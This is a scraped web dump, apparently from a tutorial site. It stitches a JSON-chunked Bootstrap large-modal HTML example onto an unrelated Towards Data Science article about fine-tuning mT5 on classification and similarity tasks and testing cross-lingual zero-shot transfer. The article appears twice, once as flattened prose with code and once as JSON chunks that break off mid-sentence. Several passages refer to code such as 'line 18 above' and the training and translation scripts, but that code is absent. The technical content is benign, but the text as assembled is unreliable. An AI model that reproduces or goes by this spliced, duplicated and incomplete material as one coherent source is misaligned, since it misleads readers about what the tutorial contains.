[ { "code": null, "e": 1135, "s": 1062, "text": "Use the .modal-lg class in Bootstrap to set large modal with more width." }, { "code": null, "e": 1193, "s": 1135, "text": "You can try to run the following code to set large modal;" }, { "code": null, "e": 1203, "s": 1193, "text": "Live Demo" }, { "code": null, "e": 2627, "s": 1203, "text": "<!DOCTYPE html>\n<html>\n <head>\n <title>Bootstrap Example</title>\n <link rel = \"stylesheet\" href = \"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css\">\n <script src = \"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\n <script src = \"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\"></script>\n </head>\n <body>\n <div class = \"container\">\n <h2>Examination</h2>\n <button type = \"button\" class = \"btn btn-lg\" data-toggle = \"modal\" data-target=\"#new\">Result</button>\n <div class = \"modal fade\" id = \"new\" role = \"dialog\">\n <div class = \"modal-dialog modal-lg\">\n <div class = \"modal-content\">\n <div class = \"modal-header\"> \n <button type = \"button\" class=\"close\" data-dismiss = \"modal\">×</button>\n <h4 class = \"modal-title\">Warning</h4>\n </div>\n <div class = \"modal-body\">\n <p>If JavaScript isn't enabled in your web browser, then you may not be able to see the result.</p>\n </div>\n <div class = \"modal-footer\">\n <button type = \"button\" class = \"btn btn-primary\" data-dismiss = \"modal\">Close</button>\n </div>\n </div>\n </div>\n </div>\n </div>\n </body>\n</html>" } ]
Going Global — How to Multi-Task in Multiple Languages with the mT5 Transformer | by Thilina Rajapakse | Towards Data Science
The original T5 (Text-To-Text Transfer Transformer) model achieved state-of-the-art performance on a variety of NLP benchmarks by leveraging a unified text-to-text format and a gigantic training dataset (C4). With the unified text-to-text approach, all downstream tasks were reframed such that both the input and the output of the model are text sequences. At a whopping 750 GB, the C4 (Colossal Clean Crawled Corpus) dataset was orders of magnitude larger than most existing datasets. Released back in October 2019 by Google, T5 still sits pretty at the top of the SuperGLUE benchmark as a testament to its capabilities.

More information regarding the original T5 implementation and how to use it can be found in my article below.

towardsdatascience.com

As impressive as T5 was (and still is), it was trained entirely on English text and can therefore only be used for English-language tasks. Sadly, this leaves out some 80% of the world population who don't speak English.

The mT5 model is a multilingual variant of the original T5 model, aimed at remedying this problem. mT5 closely follows the architecture and the training procedure of T5 but is trained on mC4 (~26 Terabytes!), a multilingual variant of the C4 dataset. It retains all the advantages of T5, but it also supports a total of 101 different languages!

mT5 reframes any NLP task as a text-to-text task, which means that both the input and the output are text sequences. Just like with T5, the task to be performed can be specified by adding a prefix (a small text sequence) to the start of the sequence as shown below. However, unlike T5, the mT5 model can also be trained on datasets in languages other than English.

Even more impressively, mT5 is also capable of cross-lingual, zero-shot transfer learning, i.e., the model is trained on an English dataset for a specific task, but it also learns to perform that task in other languages. This is quite useful when a certain dataset is only available in English, but you need it to work in another language (or multiple other languages)!

In this article, we will focus on the zero-shot transfer learning ability of mT5. We'll also do a quick comparison of its performance against T5 on English data. We'll be doing all of this with the Simple Transformers library.

In a previous article, I trained a T5 model on the 3 tasks below:

Binary classification — Yelp Reviews Dataset
Multilabel classification — Toxic Comments dataset
Sentence similarity (sentence pair regression) — STS-B dataset

towardsdatascience.com

We'll be using the same tasks and datasets to train our mT5 model so that we can easily make the comparison between mT5 and T5.

To test the zero-shot transfer learning, we'll focus on the first task. We'll translate each testing example of the Yelp dataset to five different languages and see how well the model performs on the translated data. The five languages will be Dutch, German, French, Swedish, and Spanish.

We'll be using MarianMT models to translate the text, which are also available through Simple Transformers!

Note: You can find all the code in this article in the examples/t5/mt5 directory (link) of the Simple Transformers GitHub repo.

Since we are going to be working with 3 datasets, we'll put them in 3 separate subdirectories inside the data directory.
data/binary_classification data/multilabel_classification data/regression Download the Yelp Reviews Dataset.Extract train.csv and test.csv to data/binary_classification.Download the Toxic Comments dataset.Extract the csv files to data/multilabel_classification.Download the STS-B dataset.Extract the csv files to data/regression. Download the Yelp Reviews Dataset. Extract train.csv and test.csv to data/binary_classification. Download the Toxic Comments dataset. Extract the csv files to data/multilabel_classification. Download the STS-B dataset. Extract the csv files to data/regression. The task to be performed by an mT5 model is specified by the prefix prepended to the input. Because of this, the input data format for an mT5 model (or a T5 model) in Simple Transformers is a Pandas dataframe with the 3 columns — prefix, input_text, and target_text. This makes it easy to combine all 3 of our datasets into a single dataframe, as we can simply assign a prefix value to each task and use that to differentiate between the 3 tasks. In this case, the three prefixes are as follows: binary classificationmultilabel classificationsimilarity binary classification multilabel classification similarity import pandas as pd import json from sklearn.model_selection import train_test_split prefix = 'data/binary_classification/' binary_train_df = pd.read_csv(prefix + 'train.csv', header=None) binary_train_df.head() binary_eval_df = pd.read_csv(prefix + 'test.csv', header=None) binary_eval_df.head() binary_train_df[0] = (binary_train_df[0] == 2).astype(int) binary_eval_df[0] = (binary_eval_df[0] == 2).astype(int) binary_train_df = pd.DataFrame({ 'prefix': ["binary classification" for i in range(len(binary_train_df))], 'input_text': binary_train_df[1].str.replace('\n', ' '), 'target_text': binary_train_df[0].astype(str), }) print(binary_train_df.head()) binary_eval_df = pd.DataFrame({ 'prefix': ["binary classification" for i in range(len(binary_eval_df))], 'input_text': binary_eval_df[1].str.replace('\n', ' '), 'target_text': binary_eval_df[0].astype(str), }) print(binary_eval_df.head()) prefix input_text \ 0 binary classification Unfortunately, the frustration of being Dr. Go... 1 binary classification Been going to Dr. Goldberg for over 10 years. ... 2 binary classification I don't know what Dr. Goldberg was like before... 3 binary classification I'm writing this review to give you a heads up... 4 binary classification All the food is great here. But the best thing... target_text 0 0 1 1 2 0 3 0 4 1 prefix input_text \ 0 binary classification Contrary to other reviews, I have zero complai... 1 binary classification Last summer I had an appointment to get new ti... 2 binary classification Friendly staff, same starbucks fair you get an... 3 binary classification The food is good. Unfortunately the service is... 4 binary classification Even when we didn't have a car Filene's Baseme... 
target_text 0 1 1 0 2 1 3 0 4 1 prefix = "data/multilabel_classification/" multi_train_df = pd.read_csv(prefix + 'train.csv') multi_train_df["comment_text"].str.replace('\n', ' ').str.replace('\t', ' ') for col in multi_train_df.columns: if col not in ["id", "comment_text"]: multi_train_df[col] = multi_train_df[col].apply(lambda x: col if x else "") multi_train_df["target_text"] = multi_train_df['toxic'].str.cat(multi_train_df[[col for col in multi_train_df.columns if col not in ["id", "comment_text", "toxic"]]], sep=',') multi_train_df["target_text"] = multi_train_df["target_text"].apply(lambda x: ",".join(word for word in x.split(",") if word)).apply(lambda x: x if x else "clean") multi_train_df["input_text"] = multi_train_df["comment_text"].str.replace('\n', ' ') multi_train_df["prefix"] = "multilabel classification" multi_train_df = multi_train_df[["prefix", "input_text", "target_text"]] multi_train_df, multi_eval_df = train_test_split(multi_train_df, test_size=0.1) multi_train_df.head() prefix = 'data/regression/' sts_train_df = pd.read_csv(prefix + 'train.tsv', sep='\t', error_bad_lines=False).dropna() sts_eval_df = pd.read_csv(prefix + 'dev.tsv', sep='\t', error_bad_lines=False).dropna() sts_train_df["sentence1"] = sts_train_df["sentence1"].str.replace('\n', ' ').str.replace('\t', ' ') sts_train_df["sentence2"] = sts_train_df["sentence2"].str.replace('\n', ' ').str.replace('\t', ' ') sts_eval_df["sentence1"] = sts_eval_df["sentence1"].str.replace('\n', ' ').str.replace('\t', ' ') sts_eval_df["sentence2"] = sts_eval_df["sentence2"].str.replace('\n', ' ').str.replace('\t', ' ') b'Skipping line 2509: expected 10 fields, saw 11\nSkipping line 2650: expected 10 fields, saw 11\nSkipping line 2727: expected 10 fields, saw 11\nSkipping line 3071: expected 10 fields, saw 11\nSkipping line 3393: expected 10 fields, saw 11\n' b'Skipping line 1042: expected 10 fields, saw 11\nSkipping line 1066: expected 10 fields, saw 11\nSkipping line 1083: expected 10 fields, saw 11\nSkipping line 1137: expected 10 fields, saw 11\nSkipping line 1150: expected 10 fields, saw 11\n' sts_train_df.drop(2001, inplace=True) # This line is badly formatted. Getting rid. sts_train_df["input_text"] = sts_train_df.apply(lambda x: "sentence1: " + x["sentence1"] + " sentence2: " + x["sentence2"], axis=1) sts_eval_df["input_text"] = sts_eval_df.apply(lambda x: "sentence1: " + x["sentence1"] + " sentence2: " + x["sentence2"], axis=1) sts_train_df["target_text"] = sts_train_df["score"].apply(lambda x: round(x * 5) / 5).astype(str) sts_eval_df["target_text"] = sts_eval_df["score"].apply(lambda x: round(x * 5) / 5).astype(str) sts_train_df["prefix"] = "similarity" sts_eval_df["prefix"] = "similarity" sts_train_df = sts_train_df[["prefix", "input_text", "target_text"]] sts_eval_df = sts_eval_df[["prefix", "input_text", "target_text"]] train_df = pd.concat([binary_train_df, multi_train_df, sts_train_df]).astype(str) eval_df = pd.concat([binary_eval_df, multi_eval_df, sts_eval_df]).astype(str) train_df.to_csv("data/train.tsv", "\t") eval_df.to_csv("data/eval.tsv", "\t") The notebook above loads each of the datasets; preprocesses them for mT5 and finally combines them into a unified dataframe. This gives us a dataframe with 3 unique prefixes, namely binary classification, multilabel classification, and similarity. Note that the prefixes themselves are fairly arbitrary, the important thing is to ensure that each task has its own unique prefix. 
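To make the unified format concrete, here is a small sketch (not part of the original notebook) that prints one example row per task. It assumes the train_df built above is still in memory:

# Print one example row for each of the three task prefixes.
# train_df is the combined dataframe created by the notebook above.
for task in ["binary classification", "multilabel classification", "similarity"]:
    sample = train_df[train_df["prefix"] == task].iloc[0]
    print(f"prefix: {sample['prefix']}")
    print(f"input_text: {sample['input_text'][:80]}...")
    print(f"target_text: {sample['target_text']}\n")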
The input to the model will take the following format:

<prefix>: <input_text>

The ": " is automatically added when training.

A few other things to note:

The output of the multilabel classification task is a comma-separated list of the predicted labels (toxic, severe_toxic, obscene, threat, insult, identity_hate). If no label is predicted, the output should be clean.

The input_text for the similarity task includes both sentences, as shown in the following example:
sentence1: A man plays the guitar. sentence2: The man sang and played his guitar.

The output of the similarity task is a number (as a string) between 0.0 and 5.0, going by increments of 0.2. (E.g. 0.0, 0.4, 3.0, 5.0).

Running the notebook should give you two files, train.tsv and eval.tsv, which we will use to train and test our model!

We will be using the Simple Transformers library (based on the Hugging Face Transformers) to train the mT5 model. The instructions given below will install all the requirements.

Install Anaconda or Miniconda Package Manager from here.
Create a new virtual environment and install packages.
conda create -n simpletransformers python
conda activate simpletransformers
conda install pytorch>=1.6 cudatoolkit=10.2 -c pytorch
Install simpletransformers.
pip install simpletransformers

See installation docs

Training a model is quite easy with Simple Transformers. First, we start by importing the necessary libraries and setting up logging.

Next, we load the datasets that we generated earlier. Note that we are casting all the data in the Dataframe as strings. This is because mT5 is a sequence-to-sequence model which expects all inputs and outputs to be text sequences. If we have numeric values (or any other non-string values), we'll run into errors during training.

Next, we set up our pre-trained mT5 model. Here, we are configuring our mT5 model through model_args and instantiating a model with the pre-trained mt5-base weights. For more information about the different model_args and what they do, please refer to the Simple Transformers docs here and here.

A model with this configuration can be trained on a GPU with 24 GB of VRAM. If your GPU has less VRAM than that and you run into CUDA memory issues, you can try using smaller train_batch_size and eval_batch_size values. You can also try using the google/mt5-small model which requires less memory (replace "google/mt5-base" with "google/mt5-small" in line 18 above).

Now, we just have to train our model! The evaluation line is optional as we'll be doing some real testing in the next section. You can comment it out to save some time.

In our first test, we'll follow the same evaluation procedure as in my original T5 experiment. Specifically, we'll use the following metrics.

Binary Classification: F1 score and Accuracy score
Multilabel Classification: F1 score (Hugging Face SQuAD metrics implementation) and Exact matches (Hugging Face SQuAD metrics implementation)
Similarity: Pearson correlation coefficient and Spearman correlation

First, we will define the functions to calculate the metrics given above.

Next, we read in the evaluation dataset and process it for testing. Here,

to_predict: List of input sequences with the prefix and ": " prepended, as expected by the mT5 model.
truth: List of true labels
tasks: List of tasks (binary classification, multilabel classification, or similarity) corresponding to each sequence in to_predict.

Then, we load our trained mT5 model and generate predictions for each input sequence.

As a sequence-to-sequence model, the decoding algorithm used and the hyperparameters (num_beams, do_sample, top_k, top_p) used to control it have a substantial impact on the quality of the predictions. If you'd like to learn more about the decoding process, please refer to the decoding algorithms section in this article and this excellent notebook by Huggingface.

Now that we have our predictions (in df["predicted"]), it's time to calculate the metrics. Running this snippet of code yields the results shown below.

-----------------------------------
Results:
Scores for binary classification:
F1 score: 0.8974482916528863
Accuracy Score: 0.893921052631579
Scores for multilabel classification:
F1 score: 0.8971675648577516
Exact matches: 0.8971675648577516
Scores for similarity:
Pearson Correlation: 0.012219660470091782
Spearman Correlation: 0.00885628521396601

Note that there is a degree of randomness when using sampling decoding algorithms, so the scores will change when the test is repeated. However, the scores should be relatively close to these values.

Before we dig into these scores, let's put them side-by-side (and round them off for clarity) with the T5 scores for comparison.

Binary Classification

The mT5 model does a pretty good job at the binary classification task, although it does fall short of the scores set by the T5 model.

Multilabel Classification

It's a similar story with the multilabel classification task, with the mT5 model doing well but not as well as the T5 model. Typically, a monolingual model will outperform a comparable multilingual model, so these results are as expected.

Similarity

Unlike the two previous tasks, the mT5 model fails miserably at sentence similarity. While it's difficult to pinpoint the exact cause without more experimentation, the two reasons given below are likely to be largely responsible!

One significant difference between T5 and mT5 is that the former undergoes supervised training as part of the pre-training process while the latter does not. That is, the pre-trained T5 model (before we fine-tune it) is already trained on multiple downstream tasks in addition to its primary unsupervised training objective. This means that the T5 model has the advantage of prior training on the similarity task (as well as other similar tasks).

The similarity task is significantly underrepresented compared to the other two tasks. While this factor does affect the T5 model during fine-tuning, it appears that the supervised training during pre-training is able to compensate for it. Without the benefit of multi-task training during the pre-training process, this becomes a much harder challenge for the mT5 model.

There might be other reasons (e.g. similarity being a sentence-pair task) and it's likely that there are ways to get it to work for this task as well. Let me know if you find anything!

However, mT5 was never designed to beat T5 in English language tasks! So, let's move on to the true test, cross-lingual zero-shot transfer.

In this test, we want to see if an mT5 model trained on an English task can perform the same task in other languages, without further training. For this test, we'll focus on the first task, i.e. binary classification (a quick sketch of what such a zero-shot prediction looks like is given below).
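This sketch is not from the original article; it assumes model is the fine-tuned T5Model loaded in the evaluation code above, and the Dutch review is a made-up example:

# Hypothetical example: the model was fine-tuned only on English Yelp reviews,
# but at inference time we hand it a Dutch review with the same task prefix.
dutch_review = "Het eten was heerlijk en het personeel was erg vriendelijk."
prediction = model.predict([f"binary classification: {dutch_review}"])
print(prediction)  # expected to be something like ['1'] (a positive review)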
We won't be testing on the other tasks as the second task involves a lot of toxic language (I don't expect the translation models to perform well here). The third task is, unfortunately, disqualified by default as it didn't do well even in English.

Before we can test the cross-lingual capabilities of mT5, we'll first need to translate our evaluation data. For this, we'll use the pre-trained MarianMT models originally trained by Jörg Tiedemann using the Marian C++ library.

First, we'll set up our translation models in translation_models.py. Here, we are setting up functions to load four different translation models (english_to_romance_model will handle both French and Spanish).

Next, we'll use these models to translate our evaluation dataset. Note that the translations may take some time depending on available computational resources. If you want to speed things up, you can test with one language only.

To keep the code clean, we'll be doing this step in another file, translate_dataset.py.

You can drop the languages you don't want from the languages list in line 51. You can also comment out the unused translation models defined in model_map to prevent them from being downloaded and loaded into memory.

Running the script above will generate the translated datasets and save them to the data directory.

The code to calculate the metrics can be easily adapted from our original evaluation code. The only differences are that we need to loop over the eval.csv files for each language and we'll only be evaluating the binary classification task.

Let's see how we did!

Very impressive, considering the mT5 model was only fine-tuned on an English dataset!

Based on these results, it seems like mT5 favours more common languages, although that is to be expected. However, it's also possible that this difference is due to translation models for more common languages being relatively superior.

Unfortunately, it doesn't perform well for all the supported languages. For example, I tried a few examples in my native language, Sinhalese, with fairly poor (although not completely useless) results.

If you want to try some quick predictions yourself, use the command simple-viewer in the terminal (in the directory which contains the outputs directory).

Overall, I'm quite impressed with the performance of the mT5 model, particularly in the context of cross-lingual, zero-shot transfer learning.

However, mT5 does seem to struggle with smaller datasets when compared to T5. Oversampling the similarity dataset to bring it in line with the others (or even training mT5 on this task alone) didn't solve the issue, so it's possible that the small size of the dataset isn't the sole factor here. This calls for more investigation!

The ability to train a model on English data and have it automatically transfer that knowledge to a bunch of other languages can be incredibly useful, especially when you consider that most training datasets are only available in English.

With such versatility, I'm sure that people will come up with a ton of creative applications!
mT5: A massively multilingual pre-trained text-to-text transformer — https://arxiv.org/pdf/2010.11934.pdf
Exploring the Limits of Transfer Learning with a Unified Text-to-Text Transformer — https://arxiv.org/abs/1910.10683
Google AI Blog — https://ai.googleblog.com/2020/02/exploring-transfer-learning-with-t5.html
Huggingface Transformers — https://huggingface.co/transformers/
[ { "code": null, "e": 794, "s": 172, "text": "The original T5 (Text-To-Text Transfer Transformer) model achieved state-of-the-art performance on a variety of NLP benchmarks by leveraging a unified text-to-text format and a gigantic training dataset (C4). With the unified text-to-text approach, all downstream tasks were reframed such that both the input and the output of the model are text sequences. At a whopping 750 GB, the C4 (Colossal Clean Crawled Corpus) dataset was orders of magnitude larger than most existing datasets. Released back in October 2019 by Google, T5 still sits pretty at the top of the SuperGLUE benchmark as a testament to its capabilities." }, { "code": null, "e": 904, "s": 794, "text": "More information regarding the original T5 implementation and how to use it can be found in my article below." }, { "code": null, "e": 927, "s": 904, "text": "towardsdatascience.com" }, { "code": null, "e": 1148, "s": 927, "text": "As impressive as T5 was (and still is), it was trained entirely on English text and therefore, can only be used for English-language tasks. Sadly, this leaves out some 80% of the world population who don’t speak English." }, { "code": null, "e": 1493, "s": 1148, "text": "The mT5 model is a multilingual variant of the original T5 model, aimed at remedying this problem. mT5 closely follows the architecture and the training procedure of T5 but is trained on mC4 (~26 Terabytes!), a multilingual variant of the C4 dataset. It retains all the advantages of T5, but it also supports a total of 101 different languages!" }, { "code": null, "e": 1759, "s": 1493, "text": "MT5 reframes any NLP task as a text-to-text task, which means that both the input and the output are text sequences. Just like with T5, the task to be performed can be specified by adding a prefix (a small text sequence) to the start of the sequence as shown below." }, { "code": null, "e": 1858, "s": 1759, "text": "However, unlike T5, the mT5 model can also be trained on datasets in languages other than English." }, { "code": null, "e": 2228, "s": 1858, "text": "Even more impressively, mT5 is also capable of cross-lingual, zero-shot transfer learning, i.e., the model is trained on an English dataset for a specific task, but it also learns to perform that task in other languages. This is quite useful when a certain dataset is only available in English, but you need it to work in another language (or multiple other languages)!" }, { "code": null, "e": 2455, "s": 2228, "text": "In this article, we will focus on the zero-shot transfer learning ability of mT5. We’ll also do a quick comparison of its performance against T5 on English data. We’ll be doing all of this with the Simple Transformers library." 
}, { "code": null, "e": 2526, "s": 2455, "text": "In a previous article, I have trained a T5 model on the 3 tasks below:" }, { "code": null, "e": 2683, "s": 2526, "text": "Binary classification — Yelp Reviews DatasetMultilabel classification — Toxic Comments datasetSentence similarity (sentence pair regression) — STS-B dataset" }, { "code": null, "e": 2728, "s": 2683, "text": "Binary classification — Yelp Reviews Dataset" }, { "code": null, "e": 2779, "s": 2728, "text": "Multilabel classification — Toxic Comments dataset" }, { "code": null, "e": 2842, "s": 2779, "text": "Sentence similarity (sentence pair regression) — STS-B dataset" }, { "code": null, "e": 2865, "s": 2842, "text": "towardsdatascience.com" }, { "code": null, "e": 2993, "s": 2865, "text": "We’ll be using the same tasks and datasets to train our mT5 model so that we can easily make the comparison between mT5 and T5." }, { "code": null, "e": 3210, "s": 2993, "text": "To test the zero-shot transfer learning, we’ll focus on the first task. We’ll translate each testing example of the Yelp dataset to five different languages and see how well the model performs on the translated data." }, { "code": null, "e": 3237, "s": 3210, "text": "The five languages will be" }, { "code": null, "e": 3269, "s": 3237, "text": "DutchGermanFrenchSwedishSpanish" }, { "code": null, "e": 3275, "s": 3269, "text": "Dutch" }, { "code": null, "e": 3282, "s": 3275, "text": "German" }, { "code": null, "e": 3289, "s": 3282, "text": "French" }, { "code": null, "e": 3297, "s": 3289, "text": "Swedish" }, { "code": null, "e": 3305, "s": 3297, "text": "Spanish" }, { "code": null, "e": 3413, "s": 3305, "text": "We’ll be using MarianMT models to translate the text, which are also available through Simple Transformers!" }, { "code": null, "e": 3541, "s": 3413, "text": "Note: You can find all the code in this article in the examples/t5/mt5 directory (link) of the Simple Transformers Github repo." }, { "code": null, "e": 3662, "s": 3541, "text": "Since we are going to be working with 3 datasets, we’ll put them in 3 separate subdirectories inside the data directory." }, { "code": null, "e": 3689, "s": 3662, "text": "data/binary_classification" }, { "code": null, "e": 3720, "s": 3689, "text": "data/multilabel_classification" }, { "code": null, "e": 3736, "s": 3720, "text": "data/regression" }, { "code": null, "e": 3992, "s": 3736, "text": "Download the Yelp Reviews Dataset.Extract train.csv and test.csv to data/binary_classification.Download the Toxic Comments dataset.Extract the csv files to data/multilabel_classification.Download the STS-B dataset.Extract the csv files to data/regression." }, { "code": null, "e": 4027, "s": 3992, "text": "Download the Yelp Reviews Dataset." }, { "code": null, "e": 4089, "s": 4027, "text": "Extract train.csv and test.csv to data/binary_classification." }, { "code": null, "e": 4126, "s": 4089, "text": "Download the Toxic Comments dataset." }, { "code": null, "e": 4183, "s": 4126, "text": "Extract the csv files to data/multilabel_classification." }, { "code": null, "e": 4211, "s": 4183, "text": "Download the STS-B dataset." }, { "code": null, "e": 4253, "s": 4211, "text": "Extract the csv files to data/regression." }, { "code": null, "e": 4520, "s": 4253, "text": "The task to be performed by an mT5 model is specified by the prefix prepended to the input. Because of this, the input data format for an mT5 model (or a T5 model) in Simple Transformers is a Pandas dataframe with the 3 columns — prefix, input_text, and target_text." 
}, { "code": null, "e": 4700, "s": 4520, "text": "This makes it easy to combine all 3 of our datasets into a single dataframe, as we can simply assign a prefix value to each task and use that to differentiate between the 3 tasks." }, { "code": null, "e": 4749, "s": 4700, "text": "In this case, the three prefixes are as follows:" }, { "code": null, "e": 4806, "s": 4749, "text": "binary classificationmultilabel classificationsimilarity" }, { "code": null, "e": 4828, "s": 4806, "text": "binary classification" }, { "code": null, "e": 4854, "s": 4828, "text": "multilabel classification" }, { "code": null, "e": 4865, "s": 4854, "text": "similarity" }, { "code": null, "e": 4951, "s": 4865, "text": "import pandas as pd\nimport json\nfrom sklearn.model_selection import train_test_split\n" }, { "code": null, "e": 5795, "s": 4951, "text": "prefix = 'data/binary_classification/'\n\nbinary_train_df = pd.read_csv(prefix + 'train.csv', header=None)\nbinary_train_df.head()\n\nbinary_eval_df = pd.read_csv(prefix + 'test.csv', header=None)\nbinary_eval_df.head()\n\nbinary_train_df[0] = (binary_train_df[0] == 2).astype(int)\nbinary_eval_df[0] = (binary_eval_df[0] == 2).astype(int)\n\nbinary_train_df = pd.DataFrame({\n 'prefix': [\"binary classification\" for i in range(len(binary_train_df))],\n 'input_text': binary_train_df[1].str.replace('\\n', ' '),\n 'target_text': binary_train_df[0].astype(str),\n})\n\nprint(binary_train_df.head())\n\nbinary_eval_df = pd.DataFrame({\n 'prefix': [\"binary classification\" for i in range(len(binary_eval_df))],\n 'input_text': binary_eval_df[1].str.replace('\\n', ' '),\n 'target_text': binary_eval_df[0].astype(str),\n})\n\n\nprint(binary_eval_df.head())\n" }, { "code": null, "e": 6920, "s": 5795, "text": "prefix input_text \\\n0 binary classification Unfortunately, the frustration of being Dr. Go... \n1 binary classification Been going to Dr. Goldberg for over 10 years. ... \n2 binary classification I don't know what Dr. Goldberg was like before... \n3 binary classification I'm writing this review to give you a heads up... \n4 binary classification All the food is great here. But the best thing... \n\n target_text \n0 0 \n1 1 \n2 0 \n3 0 \n4 1 \n prefix input_text \\\n0 binary classification Contrary to other reviews, I have zero complai... \n1 binary classification Last summer I had an appointment to get new ti... \n2 binary classification Friendly staff, same starbucks fair you get an... \n3 binary classification The food is good. Unfortunately the service is... \n4 binary classification Even when we didn't have a car Filene's Baseme... 
\n\n target_text \n0 1 \n1 0 \n2 1 \n3 0 \n4 1 \n" }, { "code": null, "e": 7913, "s": 6920, "text": "prefix = \"data/multilabel_classification/\"\n\nmulti_train_df = pd.read_csv(prefix + 'train.csv')\nmulti_train_df[\"comment_text\"].str.replace('\\n', ' ').str.replace('\\t', ' ')\n\nfor col in multi_train_df.columns:\n if col not in [\"id\", \"comment_text\"]:\n multi_train_df[col] = multi_train_df[col].apply(lambda x: col if x else \"\")\n\nmulti_train_df[\"target_text\"] = multi_train_df['toxic'].str.cat(multi_train_df[[col for col in multi_train_df.columns if col not in [\"id\", \"comment_text\", \"toxic\"]]], sep=',')\nmulti_train_df[\"target_text\"] = multi_train_df[\"target_text\"].apply(lambda x: \",\".join(word for word in x.split(\",\") if word)).apply(lambda x: x if x else \"clean\")\nmulti_train_df[\"input_text\"] = multi_train_df[\"comment_text\"].str.replace('\\n', ' ')\nmulti_train_df[\"prefix\"] = \"multilabel classification\"\nmulti_train_df = multi_train_df[[\"prefix\", \"input_text\", \"target_text\"]]\n\nmulti_train_df, multi_eval_df = train_test_split(multi_train_df, test_size=0.1)\n\nmulti_train_df.head()\n" }, { "code": null, "e": 8519, "s": 7913, "text": "prefix = 'data/regression/'\n\nsts_train_df = pd.read_csv(prefix + 'train.tsv', sep='\\t', error_bad_lines=False).dropna()\nsts_eval_df = pd.read_csv(prefix + 'dev.tsv', sep='\\t', error_bad_lines=False).dropna()\n\nsts_train_df[\"sentence1\"] = sts_train_df[\"sentence1\"].str.replace('\\n', ' ').str.replace('\\t', ' ')\nsts_train_df[\"sentence2\"] = sts_train_df[\"sentence2\"].str.replace('\\n', ' ').str.replace('\\t', ' ')\nsts_eval_df[\"sentence1\"] = sts_eval_df[\"sentence1\"].str.replace('\\n', ' ').str.replace('\\t', ' ')\nsts_eval_df[\"sentence2\"] = sts_eval_df[\"sentence2\"].str.replace('\\n', ' ').str.replace('\\t', ' ')\n" }, { "code": null, "e": 9008, "s": 8519, "text": "b'Skipping line 2509: expected 10 fields, saw 11\\nSkipping line 2650: expected 10 fields, saw 11\\nSkipping line 2727: expected 10 fields, saw 11\\nSkipping line 3071: expected 10 fields, saw 11\\nSkipping line 3393: expected 10 fields, saw 11\\n'\nb'Skipping line 1042: expected 10 fields, saw 11\\nSkipping line 1066: expected 10 fields, saw 11\\nSkipping line 1083: expected 10 fields, saw 11\\nSkipping line 1137: expected 10 fields, saw 11\\nSkipping line 1150: expected 10 fields, saw 11\\n'\n" }, { "code": null, "e": 9092, "s": 9008, "text": "sts_train_df.drop(2001, inplace=True) # This line is badly formatted. 
Getting rid.\n" }, { "code": null, "e": 9763, "s": 9092, "text": "sts_train_df[\"input_text\"] = sts_train_df.apply(lambda x: \"sentence1: \" + x[\"sentence1\"] + \" sentence2: \" + x[\"sentence2\"], axis=1)\nsts_eval_df[\"input_text\"] = sts_eval_df.apply(lambda x: \"sentence1: \" + x[\"sentence1\"] + \" sentence2: \" + x[\"sentence2\"], axis=1)\n\nsts_train_df[\"target_text\"] = sts_train_df[\"score\"].apply(lambda x: round(x * 5) / 5).astype(str)\nsts_eval_df[\"target_text\"] = sts_eval_df[\"score\"].apply(lambda x: round(x * 5) / 5).astype(str)\n\nsts_train_df[\"prefix\"] = \"similarity\"\nsts_eval_df[\"prefix\"] = \"similarity\"\n\nsts_train_df = sts_train_df[[\"prefix\", \"input_text\", \"target_text\"]]\nsts_eval_df = sts_eval_df[[\"prefix\", \"input_text\", \"target_text\"]]\n" }, { "code": null, "e": 9924, "s": 9763, "text": "train_df = pd.concat([binary_train_df, multi_train_df, sts_train_df]).astype(str)\neval_df = pd.concat([binary_eval_df, multi_eval_df, sts_eval_df]).astype(str)\n" }, { "code": null, "e": 10003, "s": 9924, "text": "train_df.to_csv(\"data/train.tsv\", \"\\t\")\neval_df.to_csv(\"data/eval.tsv\", \"\\t\")\n" }, { "code": null, "e": 10131, "s": 10006, "text": "The notebook above loads each of the datasets; preprocesses them for mT5 and finally combines them into a unified dataframe." }, { "code": null, "e": 10440, "s": 10131, "text": "This gives us a dataframe with 3 unique prefixes, namely binary classification, multilabel classification, and similarity. Note that the prefixes themselves are fairly arbitrary, the important thing is to ensure that each task has its own unique prefix. The input to the model will take the following format:" }, { "code": null, "e": 10463, "s": 10440, "text": "<prefix>: <input_text>" }, { "code": null, "e": 10510, "s": 10463, "text": "The \": \" is automatically added when training." }, { "code": null, "e": 10538, "s": 10510, "text": "A few other things to note:" }, { "code": null, "e": 10754, "s": 10538, "text": "The output of the multilabel classification task is a comma-separated list of the predicted labels (toxic, severe_toxic, obscene, threat, insult, identity_hate). If no label is predicted, the output should be clean." }, { "code": null, "e": 10933, "s": 10754, "text": "The input_text for the similarity task includes both sentences as shown in the following example;sentence1: A man plays the guitar. sentence2: The man sang and played his guitar." }, { "code": null, "e": 11069, "s": 10933, "text": "The output of the similarity task is a number (as a string) between 0.0 and 5.0, going by increments of 0.2. (E.g. 0.0, 0.4, 3.0, 5.0)." }, { "code": null, "e": 11188, "s": 11069, "text": "Running the notebook should give you two files, train.tsv and eval.tsv, which we will use to train and test our model!" }, { "code": null, "e": 11302, "s": 11188, "text": "We will be using the Simple Transformers library (based on the Hugging Face Transformers) to train the mT5 model." }, { "code": null, "e": 11366, "s": 11302, "text": "The instructions given below will install all the requirements." 
}, { "code": null, "e": 11662, "s": 11366, "text": "Install Anaconda or Miniconda Package Manager from here.Create a new virtual environment and install packages.conda create -n simpletransformers pythonconda activate simpletransformersconda install pytorch>=1.6 cudatoolkit=10.2 -c pytorchInstall simpletransformers.pip install simpletransformers" }, { "code": null, "e": 11719, "s": 11662, "text": "Install Anaconda or Miniconda Package Manager from here." }, { "code": null, "e": 11902, "s": 11719, "text": "Create a new virtual environment and install packages.conda create -n simpletransformers pythonconda activate simpletransformersconda install pytorch>=1.6 cudatoolkit=10.2 -c pytorch" }, { "code": null, "e": 11960, "s": 11902, "text": "Install simpletransformers.pip install simpletransformers" }, { "code": null, "e": 11982, "s": 11960, "text": "See installation docs" }, { "code": null, "e": 12116, "s": 11982, "text": "Training a model is quite easy with Simple Transformers. First, we start by importing the necessary libraries and setting up logging." }, { "code": null, "e": 12170, "s": 12116, "text": "Next, we load the datasets that we generated earlier." }, { "code": null, "e": 12447, "s": 12170, "text": "Note that we are casting all the data in the Dataframe as strings. This is 